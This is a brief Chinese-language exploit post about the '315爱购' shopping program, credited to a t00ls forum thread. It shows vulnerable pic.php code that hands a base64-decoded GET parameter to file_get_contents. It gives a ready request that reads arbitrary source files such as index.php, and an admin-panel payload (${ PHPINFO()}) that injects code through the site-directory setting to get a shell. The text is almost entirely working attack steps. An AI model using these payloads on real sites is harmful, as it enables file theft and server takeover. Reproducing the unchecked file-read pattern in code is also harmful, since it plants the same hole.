315爱购程序任意文件源码查看

pic.php

function url_base64_decode($code)
{
        if($code=="")
                return "";
    $code=str_replace("!",'+',$code);
    $code=str_replace(",",'/',$code);
    $str=base64_decode($code);
    return $str;
}
$url=url_base64_decode($_GET["url"]);
//....省略
header("Content-type: image/jpeg");
echo file_get_contents($url);

exp:http://site/pic.php?url=aW5kZXgucGhw

后台GETSHELL

系统基本参数->网站所在目录：->${ PHPINFO()}

摘自：https://t00ls.net/viewthread.php?tid=20491&extra=page%3D1%26amp%3Borderby%3Ddateline%26amp%3Bfilter%3D2592000

文章目录